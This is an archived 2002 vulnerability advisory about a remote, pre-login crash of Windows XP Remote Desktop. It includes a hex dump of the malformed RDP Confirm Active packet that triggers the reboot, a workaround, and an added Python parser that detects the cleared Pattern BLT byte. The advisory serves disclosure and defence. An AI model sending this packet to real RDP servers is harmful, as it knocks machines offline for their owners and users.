From: Ben Cohen (bc_at_skygate.co.uk)
Date: Mon Sep 16 2002 - 03:50:45 CDT

    Vulnerable

    Microsoft Windows XP Professional
    Microsoft Windows .NET Standard Server Beta 3

    Non-vulnerable

    Microsoft Windows 2000 Server

    Background

    Windows XP Professional is subject to a remote denial of service when Remote
    Desktop is enabled. Remote Desktop is XP Professional's single-user RDP
    server (Terminal Services).

    Discussion

    At the start of the protocol there is a negotiation of client and server
    graphics capabilities, in a packet called PDU Confirm Active. A block of
    32 bytes in this packet allows the client to disable the drawing commands
    that it does not support.

    One of these apparently controls whether the Pattern BLT command is sent.
    On Windows 2000 Server, disabling this command will make the server send
    bitmaps instead of Pattern BLT commands. However, Windows XP Professional
    apparently reboots when it tries to render patterns; since this happens
    while the login screen is being drawn, this does not require the client to
    have logged on or authenticated to the server. This applies to all
    versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also
    reproducible with Windows .NET Standard Server Beta 3.

    Workaround

    Disable Remote Desktop (from Control Panel, System, Remote, Remote
    Desktop, deselect the option "Allow users to connect remotely to this
    computer").

    Exploit

    Shown below are the unencrypted contents of the problematic PDU Confirm
    Active packet. The only change from what the client normally sends is the
    byte marked on the line indicated, 01 changed to 00.

    c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
    4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
    03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
    00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
    00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
    58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
    2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01"
    00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
    00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
    00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
    00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
    08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
    00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
    0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
    0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
    00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
    0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
    fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
    fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
    40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
    01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
    14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
    00 0a 00 01
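    The capability negotiation described under Discussion and the packet dumped
    above, parsed as an added example (not the advisory author's code): it walks
    the share control header and the capability sets, pulls the 32-byte
    orderSupport array out of the order capability set, and reports whether the
    Pattern BLT entry (index 1, TS_NEG_PATBLT_INDEX in Microsoft's later
    MS-RDPBCGR naming, which the constant names and field offsets below follow)
    has been cleared, which is the one-byte change shown in the dump. The dump is
    embedded as the sample input; the parsing functions and the check are this
    example's own.

```python
import struct

# Names and field layout follow Microsoft's MS-RDPBCGR (TS_CONFIRM_ACTIVE_PDU,
# TS_ORDER_CAPABILITYSET); the parsing and the check are this example's own.
PDUTYPE_CONFIRMACTIVEPDU = 0x3   # low nibble of the share control pduType
CAPSTYPE_ORDER = 0x0003
TS_NEG_PATBLT_INDEX = 1          # orderSupport[1] is Pattern BLT
ORDER_FLAGS_BODY_OFFSET = 30     # after terminalDescriptor, pads, granularities, level, fonts
ORDER_SUPPORT_BODY_OFFSET = 32   # the 32-byte orderSupport array follows orderFlags

# The advisory's unencrypted Confirm Active PDU, copied from the dump above
# (already carrying the 01 -> 00 change at orderSupport[1]).
ADVISORY_PDU = bytes.fromhex("".join("""
c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01
4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00
03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00
00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05
00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00
58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00
2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00
00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00
00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00
00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00
00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00
08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00
00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00
0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00
0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00
00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00
0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00
fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00
fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01
40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00
01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00
14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00
00 0a 00 01
""".split()))


def parse_confirm_active(pdu):
    """Return the share control header fields and a list of (type, offset, body) capability sets."""
    if len(pdu) < 16:
        raise ValueError("too short for a share control header")
    total_len, pdu_type, _pdu_source = struct.unpack_from("<HHH", pdu, 0)
    if total_len != len(pdu):
        raise ValueError("totalLength %d != %d bytes supplied" % (total_len, len(pdu)))
    if pdu_type & 0x0F != PDUTYPE_CONFIRMACTIVEPDU:
        raise ValueError("not a Confirm Active PDU: pduType=0x%04x" % pdu_type)
    share_id, _originator, len_src, len_caps = struct.unpack_from("<IHHH", pdu, 6)
    off = 16
    source_desc = pdu[off:off + len_src]
    off += len_src
    # lengthCombinedCapabilities covers numberCapabilities, pad2Octets and the sets.
    if len_caps < 4 or off + len_caps != len(pdu):
        raise ValueError("lengthCombinedCapabilities does not match the PDU")
    num_caps, _pad = struct.unpack_from("<HH", pdu, off)
    off += 4
    caps = []
    for _ in range(num_caps):
        if off + 4 > len(pdu):
            raise ValueError("truncated capability set header at %d" % off)
        cap_type, cap_len = struct.unpack_from("<HH", pdu, off)
        if cap_len < 4 or off + cap_len > len(pdu):
            raise ValueError("bad lengthCapability %d at %d" % (cap_len, off))
        caps.append((cap_type, off, pdu[off + 4:off + cap_len]))
        off += cap_len
    if off != len(pdu):
        raise ValueError("trailing bytes after the last capability set")
    return {"share_id": share_id, "source_descriptor": source_desc, "capabilities": caps}


def order_support(pdu):
    """Extract orderFlags and the 32-byte orderSupport array from the order capability set."""
    info = parse_confirm_active(pdu)
    for cap_type, off, body in info["capabilities"]:
        if cap_type == CAPSTYPE_ORDER:
            if len(body) < ORDER_SUPPORT_BODY_OFFSET + 32:
                raise ValueError("order capability set too short")
            (flags,) = struct.unpack_from("<H", body, ORDER_FLAGS_BODY_OFFSET)
            support = body[ORDER_SUPPORT_BODY_OFFSET:ORDER_SUPPORT_BODY_OFFSET + 32]
            return {"order_flags": flags, "order_support": support,
                    "order_support_offset": off + 4 + ORDER_SUPPORT_BODY_OFFSET}
    raise ValueError("no order capability set in the PDU")


def patblt_disabled(pdu):
    """True when the client cleared Pattern BLT support, the byte the advisory changes."""
    return order_support(pdu)["order_support"][TS_NEG_PATBLT_INDEX] == 0


if __name__ == "__main__":
    info = parse_confirm_active(ADVISORY_PDU)
    o = order_support(ADVISORY_PDU)
    print("source", info["source_descriptor"], "capability sets", len(info["capabilities"]))
    print("orderFlags 0x%04x orderSupport %s" % (o["order_flags"], o["order_support"].hex()))
    print("Pattern BLT disabled:", patblt_disabled(ADVISORY_PDU))
```

    Run against the dump, the parser finds the source descriptor "MSTSC", 17
    capability sets ending exactly at the 452-byte totalLength, orderFlags
    0x002a, and orderSupport[1] equal to 0; restoring that byte to 01 gives the
    packet the client normally sends, which passes the check. Note that the dump
    is the decrypted PDU: under RDP standard security this traffic is encrypted
    on the wire, so a network sensor can only apply such a check if it holds the
    session keys, and on the host itself the workaround above remains the
    practical mitigation.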

    References

    Section 8.2.5 of ITU-T Recommendation T.128, Multipoint application sharing
    (Series T: Terminals for telematic services).

    Microsoft was notified on 16 April 2002.

    Credits

    Ben Cohen
    ben.cohenskygate.co.uk

    Skygate Technology Ltd.
    http://www.skygate.co.uk/
    +44 (0)20 8542 7856